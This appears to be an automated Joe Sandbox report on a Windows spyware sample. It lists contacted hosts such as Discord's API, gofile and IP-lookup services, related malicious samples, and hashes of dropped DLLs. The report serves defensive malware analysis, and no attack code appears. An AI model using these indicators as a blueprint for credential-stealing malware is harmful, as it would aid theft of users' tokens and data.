                                                                                                            https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.KzqQe0QtRd.exe, 00000001.00000003.295661249.0000022127ED7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287859359.0000022127ED3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://packaging.python.org/installing/KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://steam.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                low
                                                                                                                http://google.com/KzqQe0QtRd.exe, 00000001.00000003.275364164.0000022127DB2000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292634328.0000022127DD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277993151.0000022127DC8000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279928509.0000022127DCA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277253564.0000022127DB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://mahler:8092/site-updates.pyKzqQe0QtRd.exe, 00000001.00000002.298114495.0000022127381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  low
                                                                                                                  https://api.gofile.io/getServerrKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.mKzqQe0QtRd.exefalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://crl.securetrust.com/SGCA.crlKzqQe0QtRd.exe, 00000001.00000003.295488552.0000022128152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tools.ietf.org/html/rfc5869KzqQe0QtRd.exe, 00000001.00000003.275507020.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280259713.0000022127D17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://github.com/psf/blackKzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.python.org/download/releases/2.3/mro/.KzqQe0QtRd.exe, 00000001.00000002.296609743.00000221266B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.htmlKzqQe0QtRd.exe, 00000001.00000003.289970440.00000221280C9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.290968714.0000022127D47000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291291027.0000022127FBB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295661249.0000022127EE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295871177.0000022127E93000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275288125.0000022127F91000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275479991.0000022127EE5000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287859359.0000022127E92000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275507020.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291517549.0000022127FBE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.278987782.00000221280C9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291740769.0000022127D4B000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280259713.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280797584.0000022127F96000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287059855.0000022127F9A000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274505409.0000022127E8F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275572297.0000022127E92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://discordapp.com/api/v6/users/KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/Ousret/charset_normalizerKzqQe0QtRd.exe, 00000001.00000003.292085021.0000022127372000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.firmaprofesional.com/cps0KzqQe0QtRd.exe, 00000001.00000003.282830555.0000022127316000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287215790.000002212731F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275123747.0000022128261000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279603095.0000022127315000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275507020.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280259713.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.297991676.000002212732C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.289758407.0000022127329000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292497795.000002212732C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://tidelift.com/subscription/pkg/pypi-setuptools?utm_source=pypi-setuptools&utm_medium=referralKzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://docs.python.org/3/library/re.html#re.subKzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs
                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    162.159.136.232
                                                                                                                                    unknownUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    162.159.137.232
                                                                                                                                    ptb.discord.comUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    51.178.66.33
                                                                                                                                    unknownFrance
                                                                                                                                    16276OVHFRfalse
                                                                                                                                    64.185.227.156
                                                                                                                                    unknownUnited States
                                                                                                                                    18450WEBNXUSfalse
                                                                                                                                    159.89.102.253
                                                                                                                                    geolocation-db.comUnited States
                                                                                                                                    14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                    162.159.135.232
                                                                                                                                    unknownUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    173.231.16.76
                                                                                                                                    api4.ipify.orgUnited States
                                                                                                                                    18450WEBNXUSfalse
                                                                                                                                    51.38.43.18
                                                                                                                                    api.gofile.ioFrance
                                                                                                                                    16276OVHFRfalse
                                                                                                                                    Joe Sandbox Version:38.0.0 Beryl
                                                                                                                                    Analysis ID:1305930
                                                                                                                                    Start date and time:2023-09-08 07:30:14 +02:00
                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 8m 51s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                    Number of analysed new started processes analysed:18
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Sample file name:KzqQe0QtRd.exe
                                                                                                                                    Original Sample Name:7fe90dcf5c49fd85ce12939b8cc3315c.exe
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal72.troj.spyw.winEXE@6/80@14/8
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 99%
                                                                                                                                    • Number of executed functions: 42
                                                                                                                                    • Number of non-executed functions: 69
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                    • Excluded domains from analysis (whitelisted): kv601.prod.do.dsp.mp.microsoft.com, geover.prod.do.dsp.mp.microsoft.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, arc.msn.com
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                    No simulations
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    162.159.136.232BFdDLHONGH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                      E-DEKONT1,DOC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                        EL3MgXmFGp.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          DHL_Express_28015809822.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            #U00d6deme_#U0130#U00e7in_Proforma_Fatura.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                              wZDeMCqksv.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                                Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  rozineni.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                    FedEx_AWB#50253274643.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.19137.8960.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          FedEx_AWB#503573277643.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                              e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                A#U011fustos_Sat#U0131n_Alma_Sipari#U015fi-081723.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  Ziraat_Bankas#U0131_Swift_Mesaji.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    z46eKpNczsvsrg2wHR.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                      e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                        e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          LpBTMoSyyx.exeGet hashmaliciousAsyncRAT, DarkTortilla, StormKittyBrowse
                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            api4.ipify.orgSecuriteInfo.com.Win32.TrojanX-gen.11530.1442.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 64.185.227.156
                                                                                                                                                                            https://r20.rs6.net/tn.jsp?f=001ufeRPKBUNJOknPgK4Ctl-2CHzyxlzChpTEhOBujYE0OUYjTUZxb65gwOBeq9LNgAUkqZssh-s2MlkqQYYkkkJbdUJiB0vZkvP5Wv3mutQfDuckXOLKsNC9n0Xx6CRtucTMMDKf8q3xVqMLbPU4yVq2WaXTvhqVUt&c=7kTYdGZIm1dRziR1jCVhUWIcyDu_26FXgUNlyAMytgWiEqB77AK3pQ==&ch=-4ZH1TFoMQ4NLYDqy295NGpvbnr8nfgSCe0_GG7QGnKt8SGfU2o-NA==&__=ZGxldnlAd3lud2FyZC5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 104.237.62.212
                                                                                                                                                                            QcCjhzamSI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 173.231.16.76
                                                                                                                                                                            VNw2AP5Tj2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 104.237.62.212
                                                                                                                                                                            https://www.linkedin.com/slink/?code=euCi5VBx#and1QHd5bndhcmQuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 104.237.62.212
                                                                                                                                                                            SecuriteInfo.com.Win32.PWSX-gen.19939.26903.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 64.185.227.156
                                                                                                                                                                            New_Purchase_Order.xlsmGet hashmaliciousAgentTesla, NSISDropperBrowse
                                                                                                                                                                            • 64.185.227.156
                                                                                                                                                                            #U00f3rdenes_pendientes________pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 104.237.62.212
                                                                                                                                                                            xCIsKJA2z8.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 104.237.62.212
                                                                                                                                                                            at1bhqSn5F.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 104.237.62.212
                                                                                                                                                                            https://r20.rs6.net/tn.jsp?f=0010Hb9AtHzYDDTbKv8idad1HYXJm9TnI69yRRh_yJlYMyZqen7V2vw5Vew71_EUAszCpmRzmytac9Ny5WpMEK6M9a3fX5MNJtBTQe8Q6Vhy7u7D8FNwX1lel_pbBS2--vWg9t9KpRjY1YokhVGY37JuYTh4vA2v42B&c=I1qlIb0kBtQc8SViF-8_1iefUYHYViQBmB43ZK4LvlLg7lOz0iFFFA==&ch=Ow7_Sk1o_uHMhxNIEokjegODrBrGZBxx36TIKMZJaYQ8E62tWrYtGA==&__=c2x1a2Fjc0B3eW53YXJkLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 173.231.16.76
                                                                                                                                                                            3Tzm9pGIDj.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 64.185.227.156
                                                                                                                                                                            2859531946.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 173.231.16.76
                                                                                                                                                                            D0mw1vNLhV.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 104.237.62.212
                                                                                                                                                                            Quotation.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 64.185.227.156
                                                                                                                                                                            XpXJvfwBgE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 104.237.62.212
                                                                                                                                                                            Jb9KLc3Qg6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 104.237.62.212
                                                                                                                                                                            ybWWIxmktc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 104.237.62.212
                                                                                                                                                                            https://r20.rs6.net/tn.jsp?f=0010Hb9AtHzYDDTbKv8idad1HYXJm9TnI69yRRh_yJlYMyZqen7V2vw5Vew71_EUAszCpmRzmytac9Ny5WpMEK6M9a3fX5MNJtBTQe8Q6Vhy7u7D8FNwX1lel_pbBS2--vWg9t9KpRjY1YokhVGY37JuYTh4vA2v42B&c=I1qlIb0kBtQc8SViF-8_1iefUYHYViQBmB43ZK4LvlLg7lOz0iFFFA==&ch=Ow7_Sk1o_uHMhxNIEokjegODrBrGZBxx36TIKMZJaYQ8E62tWrYtGA==&__=Y21hbmRhdG9AbG9ja3Rvbi5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 64.185.227.156
                                                                                                                                                                            OW2QFUVelB.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 104.237.62.212
                                                                                                                                                                            ptb.discord.comPAP46E1UkZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 162.159.128.233
                                                                                                                                                                            A4AxThCBqS.exeGet hashmaliciousNanocore, Luna Logger, Umbral StealerBrowse
                                                                                                                                                                            • 162.159.136.232
                                                                                                                                                                            SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exeGet hashmaliciousCKS Stealer, Spark RATBrowse
                                                                                                                                                                            • 162.159.137.232
                                                                                                                                                                            SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exeGet hashmaliciousCKS Stealer, Spark RATBrowse
                                                                                                                                                                            • 162.159.138.232
                                                                                                                                                                            Lunar_Builder.exeGet hashmaliciousItroublveBOT StealerBrowse
                                                                                                                                                                            • 162.159.138.232
                                                                                                                                                                            v5u7AiCLzw.exeGet hashmaliciousNitroRansomwareBrowse
                                                                                                                                                                            • 162.159.138.232
                                                                                                                                                                            NPHzyKe1zJ.exeGet hashmaliciousNitroRansomwareBrowse
                                                                                                                                                                            • 162.159.137.232
                                                                                                                                                                            ONtIB38CQZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 162.159.128.233
                                                                                                                                                                            t5UFndKp9h.exeGet hashmaliciousNitroRansomwareBrowse
                                                                                                                                                                            • 162.159.128.233
                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                            • 172.67.171.76
                                                                                                                                                                            http://track.tychon.bid/proceed.php?domain%5C=...RyZXNzIjoiMTYzLjExNi4yMDIuMjgiLCJ0eXBlIjoiamF2YV9yZWRpcmVjdCIsImJpZCI6IjAuMDQyIn0%5C=Get hashmaliciousUnknownBrowse
                                                                                                                                                                            • 104.21.38.176
                                                                                                                                                                            VM Recording 02_30secs_Play.htmGet hashmaliciousPhisherBrowse
                                                                                                                                                                            • 172.67.166.249
                                                                                                                                                                            https://agfuse.com/track/og_url?target-url=https://newforcafe.com/Tsue.mendham@wnswphn.org.auGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 104.16.123.96
                                                                                                                                                                            Pterion.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                                                                                            • 172.67.188.254
                                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 172.67.166.109
                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Babuk, Djvu, RedLine, SmokeLoaderBrowse
                                                                                                                                                                            • 172.67.181.144
                                                                                                                                                                            SongHong_BankSlip+Statement.pdf.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                            • 172.67.166.54
                                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 172.67.166.109
                                                                                                                                                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                            • 104.21.29.36
                                                                                                                                                                            https://ramcoorp.co/Mjliepe@csu.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 104.17.3.184
                                                                                                                                                                            https://ramcoorp.co/Mjliepe@csu.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 104.17.2.184
                                                                                                                                                                            https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiXkrLy55aBAxXVTaQEHZ5lBMMQFnoECA0QAQ&url=https%3A%2F%2Fservingagain.com%2Fmission-vision-values%2F&usg=AOvVaw1mOUel1ZFfnB7XRyG9B8zR&opi=89978449Get hashmaliciousUnknownBrowse
                                                                                                                                                                            • 104.17.25.14
                                                                                                                                                                            VIRUS_stub_ro_crasher.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                            • 162.159.129.233
                                                                                                                                                                            OBS-Studio.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                                                                                                                            • 104.26.10.89
                                                                                                                                                                            Builded.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                                                                                                                            • 172.67.69.96
                                                                                                                                                                            Tutanota.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                                                                                                                            • 104.26.11.89
                                                                                                                                                                            Electrum.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                                                                                                                            • 104.26.11.89
                                                                                                                                                                            comprobante.PDF.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            • 172.67.215.45
                                                                                                                                                                            XdghEZF9GO.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 104.21.46.30
                                                                                                                                                                            No context
                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_ARC4.pydrozineni.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                                              RN2ZDnNaVx.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                                                                                                                                9TEBRmxRIN.exeGet hashmaliciousAmadey, RedLine, XWormBrowse
                                                                                                                                                                                  im39RVjAx5.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                    WCzx2YwPoy.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                      FileDecrypter.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                                                        CrashHandler2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):11264
                                                                                                                                                                                          Entropy (8bit):4.690637232215493
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:XU9VD9daQ2iTrqT+y/ThvQ0I1uLfcC75JiC4Rs89EcYyGDnM0OcX6gY/7ECFV:S9damqT3ThITst0E5DnKcqgY/79X
                                                                                                                                                                                          MD5:B8CE6246C867FA4D9A97C8C0ABD86162
                                                                                                                                                                                          SHA1:8EDFDE5235A7DF73B339E27B69F6350A18085419
                                                                                                                                                                                          SHA-256:3BFCEEF9B2A31336876A2A6BE63891FDA68BA30AC37EFCB94A4CED10A6E6C23D
                                                                                                                                                                                          SHA-512:C8C10CBD6640A38351536AFC1C56795FCA1335243EE9B20F8D99B5F1F610B71465CAC45E0628C4438756CED9940EA49A9DB9EB331E6B0FB086CB9FEF3E33CA59
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                          • Filename: rozineni.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: RN2ZDnNaVx.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: 9TEBRmxRIN.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: im39RVjAx5.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: WCzx2YwPoy.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: FileDecrypter.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: CrashHandler2.exe, Detection: malicious, Browse
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.&...H...H...H.......H.I.I...H.M.I...H...I.#.H.I.M...H.I.L...H.I.K...H..@...H..H...H......H..J...H.Rich..H.................PE..d....Ded.........." ..."............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):13824
                                                                                                                                                                                          Entropy (8bit):5.043023051517476
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:SF/1nb2eqCQtkluknuz4ceS4QDuBA7cqgYvEP:o2P6luLtn4QDKmgYvEP
                                                                                                                                                                                          MD5:E598D24941E68620AEF43723B239E1C5
                                                                                                                                                                                          SHA1:FA3C711AA55A700E2D5421F5F73A50662A9CC443
                                                                                                                                                                                          SHA-256:E63D4123D894B61E0242D53813307FA1FF3B7B60818827520F7FF20CABCD8904
                                                                                                                                                                                          SHA-512:904E04FB28CFFA2890C0CB4F1169A7CC830224740F0DF3DA622AC2EB9B8F8BDBB4DE88836E40A0126BE0EB3E5131A8D8B5AAACD782D1C5875A2FBBC939F78D5B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.EY.p+..p+..p+......p+.A.*..p+.E.*..p+..p*.+p+.A....p+.A./..p+.A.(..p+...#..p+...+..p+......p+...)..p+.Rich.p+.........PE..d....Ded.........." ..."............P.....................................................`..........................................8.......9..d....`.......P..L............p..,....3...............................1..@............0...............................text...h........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):13312
                                                                                                                                                                                          Entropy (8bit):5.0459062620434185
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:7XF/1nb2eqCQtkXnFYIrWjz0YgWDbu5Ko0vdvZt49lkVcqgYvEMN:L2P6XTr0zXgWDbun0vdvZt49MgYvEMN
                                                                                                                                                                                          MD5:5CAD133D9824EBFAAAF6C23FD7117775
                                                                                                                                                                                          SHA1:C327CF3FD0F949B05C11D5447C2615C37A884E68
                                                                                                                                                                                          SHA-256:B80E579CEB9902DE24B6B0794D9169B0248C01FD539003F21E92655920EBA461
                                                                                                                                                                                          SHA-512:567E8D5FFD9CD3ECDC28E797E2A12350C607F6F1BC26C78F1B4AA50EC3833A53ECBA309D34CBEA145CA4A569EC15F1EAB4889059BAE6C2D890F0D641F3FDA423
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.EY.p+..p+..p+......p+.A.*..p+.E.*..p+..p*.+p+.A....p+.A./..p+.A.(..p+...#..p+...+..p+......p+...)..p+.Rich.p+.........PE..d....Ded.........." ..."............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):12800
                                                                                                                                                                                          Entropy (8bit):5.102755604487633
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:sBMF1siKeai1dqmJo0qVVLf/+NJSC6sc9kJ9oPobXXXP4IIYOxDm+8jcX6gRth2h:sssiHfq5poUkJ97zIDm+ucqgRvE
                                                                                                                                                                                          MD5:2C138D64B80F7C42123CCD0F03C30D30
                                                                                                                                                                                          SHA1:1F0DE4930E426F8F4F364C0F16F4A5BAA139EF85
